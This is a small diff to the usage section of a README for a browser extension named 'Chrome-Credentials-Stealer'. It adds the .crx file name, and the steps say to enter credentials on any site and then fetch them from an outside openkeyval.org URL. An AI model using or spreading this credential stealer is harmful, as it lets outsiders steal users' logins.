acrogenesis/Chrome-Credentials-Stealer/README.md

 How to use
 ----------
-1. Install the plugin in a chromium based browser.
+1. Install the plugin (chromecredentialstealer.crx) in a chromium based browser.
 2. Enter your credentials on any website
 3. Visit https://secure.openkeyval.org/fasterbrowser to retrive your credentials.